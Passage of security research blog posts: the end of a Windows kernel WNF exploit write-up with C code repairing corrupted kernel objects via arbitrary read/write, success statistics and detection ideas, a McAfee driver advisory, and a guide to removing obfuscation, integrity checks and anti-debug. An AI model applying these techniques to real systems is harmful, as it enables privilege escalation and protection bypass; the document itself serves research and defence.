07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see, there is a member TemporaryNamesListHead which is a linked list running through the TemporaryNameListEntry member (offset 0x88) of each _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each _WNF_NAME_INSTANCE by iterating through the linked list using our arbitrary read primitive.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        // ptr points at the embedded list entry; rewind 17 qwords (0x88
        // bytes) to reach the base of the _WNF_NAME_INSTANCE.
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}
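
The magic header value restored above is not arbitrary: assuming the _WNF_NODE_HEADER layout documented in the public WNF research by Ionescu and Viala (a 16-bit NodeTypeCode followed by a 16-bit NodeByteSize), it decomposes as below. The field interpretation comes from that research rather than from the code above.

```python
# Decomposing the header constant written back into corrupted name instances,
# assuming NodeTypeCode occupies the low word and NodeByteSize the next word.
WNF_NAME_INSTANCE_HEADER = 0x0000000000A80903

node_type_code = WNF_NAME_INSTANCE_HEADER & 0xFFFF           # 0x0903
node_byte_size = (WNF_NAME_INSTANCE_HEADER >> 16) & 0xFFFF   # 0xA8 == 168 bytes
```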

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examination and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset, we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.
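
The arithmetic involved can be illustrated with a small standalone sketch. Everything here is a stand-in: read64() indexes into a fake stack rather than using the kernel read primitive, and the base, RVA and kernel address range are invented for the demo (real offsets differ per build).

```python
# Illustrative sketch only: the real exploit walks the kernel stack of a
# waiting thread using its arbitrary-read primitive, looking for the return
# address of a known nt! function, then subtracts that function's RVA.

NT_BASE = 0xFFFFF80480000000   # hypothetical ntoskrnl base for the demo
KNOWN_RVA = 0x3F58B5           # hypothetical RVA of a known nt! function

fake_stack = [0x1122334455667788,
              NT_BASE + KNOWN_RVA,   # return address into ntoskrnl
              0xDEADBEEFDEADBEEF]

def read64(stack, idx):
    # stand-in for the kernel arbitrary-read primitive
    return stack[idx]

def find_nt_base(stack, known_rva, lo, hi):
    """Walk the stack for a return address that, minus the known RVA,
    yields a page-aligned base inside the kernel address range."""
    for i in range(len(stack)):
        candidate = read64(stack, i) - known_rva
        if lo <= candidate < hi and candidate & 0xFFF == 0:
            return candidate
    return None

base = find_nt_base(fake_stack, KNOWN_RVA, 0xFFFF800000000000, 1 << 64)
```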

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and while varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third-party drivers installed and a noisier kernel pool, it gives some indication of whether this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All of these are measured over 100 iterations of the exploit (over 5 runs) with a timeout of 15 seconds (i.e. a run was considered BSOD-free if no BSOD occurred within 15 seconds of executing the exploit).

  • SYSTEM shells – Number of times a SYSTEM shell was launched.
  • Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.
  • Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.
  • Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the maximum number of overflow attempts. 32 was chosen as a semi-arbitrary value, based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.
  • BSODs on exec – Number of times the exploit caused a BSOD on execution.
  • Unmapped Read – Number of times the relative read reached unmapped memory (within ExpWnfReadStateData) – included in the BSODs on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg
SYSTEM shells    |    85 |    82 |    76 |    75 |    75 |  78
Total LFH writes |   708 |   726 |   707 |   678 |   624 | 688
Avg LFH writes   |     8 |     8 |     9 |     9 |     8 |   8
Failed after 32  |     1 |     3 |     2 |     1 |     1 |   2
BSODs on exec    |    14 |    15 |    22 |    24 |    24 |  20
Unmapped Read    |     4 |     5 |     8 |     6 |    10 |   7

Spray size 6000

Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg
SYSTEM shells    |    84 |    80 |    78 |    84 |    79 |  81
Total LFH writes |   674 |   643 |   696 |   762 |   706 | 696
Avg LFH writes   |     8 |     8 |     9 |     9 |     8 |   8
Failed after 32  |     2 |     4 |     3 |     3 |     4 |   3
BSODs on exec    |    14 |    16 |    19 |    13 |    17 |  16
Unmapped Read    |     2 |     4 |     4 |     5 |     4 |   4

Spray size 10000

Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg
SYSTEM shells    |    84 |    85 |    87 |    85 |    86 |  85
Total LFH writes |   805 |   714 |   761 |   688 |   694 | 732
Avg LFH writes   |     9 |     8 |     8 |     8 |     8 |   8
Failed after 32  |     3 |     5 |     3 |     3 |     3 |   3
BSODs on exec    |    13 |    10 |    10 |    12 |    11 |  11
Unmapped Read    |     1 |     0 |     1 |     1 |     0 |   1

Spray size 20000

Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg
SYSTEM shells    |    89 |    90 |    94 |    90 |    90 |  91
Total LFH writes |   624 |   763 |   657 |   762 |   650 | 691
Avg LFH writes   |     7 |     8 |     7 |     8 |     7 |   7
Failed after 32  |     3 |     2 |     1 |     2 |     2 |   2
BSODs on exec    |     8 |     8 |     5 |     8 |     8 |   7
Unmapped Read    |     0 |     0 |     0 |     0 |     1 |   0

From this we can see that increasing the spray size greatly decreases the chance of hitting an unmapped read (due to the page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post-exploitation method used (token stealing vs modifying the existing token). The reason for this is that with the token stealing method there are more kernel reads/writes, and a longer duration before PreviousMode is reverted.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg
PRIV shells      |    94 |    92 |    93 |    92 |    89 |  92
Total LFH writes |   939 |   825 |   825 |   788 |   724 | 820
Avg LFH writes   |     9 |     8 |     8 |     8 |     8 |   8
Failed after 32  |     2 |     2 |     1 |     2 |     0 |   1
BSODs on exec    |     4 |     6 |     6 |     6 |    11 |   6
Unmapped Read    |     0 |     1 |     1 |     2 |     2 |   1

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, a patch has been available for this vulnerability since the 8th of June 2021. If you're reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this exercise, and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post-exploitation detection techniques (token stealing etc.) which have been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding of this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events while loading a new tab and web page. I didn't explore too deeply whether there are any render operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation triggered by the WNF subsystem to fault accessing unmapped memory. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained, an attacker may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios where this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve around a 90% success rate due to the techniques used. This seems to be about the limit with this approach, without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and to detect memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTLs referenced an event that was set to NULL before initialization. If the IOCTL was called at the right time, the procedure used NULL as an event and dereferenced the non-existent structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Event structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update to Drive Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT (Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to the C++ runtime’s canonical internal initialization functions such as _initterm() and _initterm_e().

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running the binary instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:
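
As a toy model of this step (the real pass drives a symbolic engine over the recovered dispatch loop; the table and offsets below are invented purely for illustration), enumerating every state index through the dispatcher yields the index-to-offset map:

```python
# Stand-in for the pointer-table dispatcher found in the flattened CFG:
# given a state value, return the offset of the BBL-chain that the
# dispatch loop would jump to.
dispatch_table = [0x401000, 0x401050, 0x4010A0, 0x401100]

def dispatcher(state):
    # the real engine symbolically executes the loop body with 'state' fixed
    return dispatch_table[state & 0x3]

def build_index_to_offset(n_indexes):
    """Iterate over all possible index values, recording where each lands;
    the original function's logic lives in the BBL-chains at these offsets."""
    return {idx: dispatcher(idx) for idx in range(n_indexes)}

index_to_offset = build_index_to_offset(len(dispatch_table))
```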

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a single static destination, which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2
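
The question put to the solver can be sketched in pure Python with a brute-force check over a small determinant domain. next_state below is a made-up branchless stand-in for the obfuscated state computation; the actual tool phrases the same question as a Z3 query over the lifted IR rather than by enumeration.

```python
from itertools import product

def next_state(mod0, mod1):
    # Made-up branchless stand-in for the obfuscated state computation:
    # equivalent to "state = 5 if mod0 == mod1 else 9".
    diff = (mod0 ^ mod1) & 0xFFFFFFFF
    nz = ((diff | -diff) >> 63) & 1   # 0 iff the determinants are equal
    return 5 + 4 * nz

def match_equal_pattern(f, domain):
    """Return (D1, D2) if f behaves as 'D1 when the determinants are equal,
    D2 otherwise' across the sampled domain, mirroring the solver query."""
    eq_vals = {f(v, v) for v in domain}
    neq_vals = {f(a, b) for a, b in product(domain, repeat=2) if a != b}
    if len(eq_vals) == 1 and len(neq_vals) == 1 and eq_vals != neq_vals:
        return eq_vals.pop(), neq_vals.pop()
    return None
```

A successful match means the whole arithmetic blob can be replaced by a plain CMP/JZ pair targeting the two recovered destination indexes.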

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory)
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.
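
The question that pass answers, "is the destination overwritten before it is ever read?", can be sketched as a straight-line backwards liveness scan. The real pass answers it path-sensitively over the IR; the trace below linearizes the earlier EAX example, so on this single path the XOR is also dead.

```python
# Toy straight-line dead-write elimination: an assignment is dropped if its
# destination register is overwritten before being read again.
def remove_dead_writes(insns):
    """insns: list of (dest_reg_or_None, set_of_read_regs) in program order."""
    live, kept = set(), []
    for dest, uses in reversed(insns):
        if dest is None or dest in live:
            kept.append((dest, uses))
            live.discard(dest)
            live |= uses
        # else: dest is written but never read before the next write -> drop
    return list(reversed(kept))

trace = [
    ("EAX", set()),     # MOV  EAX, 0x1234  (dead: overwritten below)
    (None,  {"EBX"}),   # TEST EBX, EBX
    ("EAX", {"EAX"}),   # XOR  EAX, EAX     (dead on this linearized path)
    ("EAX", set()),     # MOV  EAX, 0x1
    (None,  {"EAX"}),   # subsequent use of EAX
]
cleaned = remove_dead_writes(trace)
```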

Finally, the framework-provided simplifications, such as bbl-merger, can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”; this should be a no-op since they should never be executed, but it smooths the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and sends the execution into a stack-mangling loop before continuing, which leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

